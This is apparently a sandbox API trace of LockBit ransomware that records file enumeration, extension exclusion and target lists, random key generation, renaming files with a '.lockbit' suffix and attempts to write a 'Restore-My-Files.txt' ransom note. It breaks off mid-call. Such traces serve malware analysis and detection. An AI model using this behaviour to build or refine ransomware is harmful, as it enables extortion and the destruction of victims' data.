lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.376] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0103812.WMF") returned 1 [0138.376] lstrcmpiW (lpString1="ntldr", lpString2="J0103812.WMF") returned 1 [0138.377] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0103812.WMF") returned 1 [0138.377] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0103812.WMF") returned -1 [0138.377] lstrcmpiW (lpString1="autorun.inf", lpString2="J0103812.WMF") returned -1 [0138.377] lstrcmpiW (lpString1="thumbs.db", lpString2="J0103812.WMF") returned 1 [0138.377] lstrcmpiW (lpString1="iconcache.db", lpString2="J0103812.WMF") returned -1 [0138.377] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.377] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF") returned=".WMF" [0138.377] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.377] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.377] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.377] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.377] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.377] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.377] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.377] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.377] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.377] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.377] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.377] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.377] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.377] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.377] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.378] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.378] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.378] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.378] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.378] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.378] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.378] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.378] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.378] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.378] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.378] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.378] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.378] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.378] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF.lockbit") returned 72 [0138.378] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103812.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0138.379] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.379] malloc (_Size=0x40068) returned 0x1ff1e60 [0138.379] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5908) returned 1 [0138.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0138.380] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0138.380] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0138.389] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.389] malloc (_Size=0xa6) returned 0x77d7a8 [0138.389] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.389] free (_Block=0x77d7a8) [0138.389] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.390] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.390] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.390] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5c2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0103850.WMF", cAlternateFileName="")) returned 1 [0138.390] lstrcmpiW (lpString1=".", lpString2="J0103850.WMF") returned -1 [0138.390] lstrcmpiW (lpString1="..", lpString2="J0103850.WMF") returned -1 [0138.390] PathFindExtensionW (pszPath="J0103850.WMF") returned=".WMF" [0138.390] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.390] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.391] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.391] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0103850.WMF") returned 1 [0138.391] lstrcmpiW (lpString1="ntldr", lpString2="J0103850.WMF") returned 1 [0138.391] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0103850.WMF") returned 1 [0138.391] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0103850.WMF") returned -1 [0138.392] lstrcmpiW (lpString1="autorun.inf", lpString2="J0103850.WMF") returned -1 [0138.392] lstrcmpiW (lpString1="thumbs.db", lpString2="J0103850.WMF") returned 1 [0138.392] lstrcmpiW (lpString1="iconcache.db", lpString2="J0103850.WMF") returned -1 [0138.392] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.392] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned=".WMF" [0138.392] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.392] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.392] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.393] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.393] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.393] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF.lockbit") returned 72 [0138.393] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0138.393] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.393] malloc (_Size=0x40068) returned 0x3d70450 [0138.393] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=23596) returned 1 [0138.393] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.394] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0138.394] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.394] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0138.394] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.400] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.400] malloc (_Size=0xa6) returned 0x77d7a8 [0138.400] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.401] free (_Block=0x77d7a8) [0138.401] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.401] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.401] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.402] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1434, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105230.WMF", cAlternateFileName="")) returned 1 [0138.402] lstrcmpiW (lpString1=".", lpString2="J0105230.WMF") returned -1 [0138.402] lstrcmpiW (lpString1="..", lpString2="J0105230.WMF") returned -1 [0138.402] PathFindExtensionW (pszPath="J0105230.WMF") returned=".WMF" [0138.402] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.402] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.402] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.402] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.402] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.402] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.402] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.402] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.402] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.402] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.402] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.402] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.402] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.402] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.402] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.402] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.403] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.403] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.404] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.404] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.404] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.404] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.404] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.404] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.404] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105230.WMF") returned 1 [0138.404] lstrcmpiW (lpString1="ntldr", lpString2="J0105230.WMF") returned 1 [0138.404] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105230.WMF") returned 1 [0138.404] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105230.WMF") returned -1 [0138.404] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105230.WMF") returned -1 [0138.404] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105230.WMF") returned 1 [0138.404] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105230.WMF") returned -1 [0138.404] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.404] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF") returned=".WMF" [0138.404] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.404] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.404] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.404] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.404] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.404] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.404] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.404] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.405] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.405] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF.lockbit") returned 72 [0138.405] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105230.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0138.406] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.406] malloc (_Size=0x40068) returned 0x3df0008 [0138.406] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5172) returned 1 [0138.406] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.407] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.407] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.408] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.408] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.412] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.412] malloc (_Size=0xa6) returned 0x77d7a8 [0138.412] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.413] free (_Block=0x77d7a8) [0138.413] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.413] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.413] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, 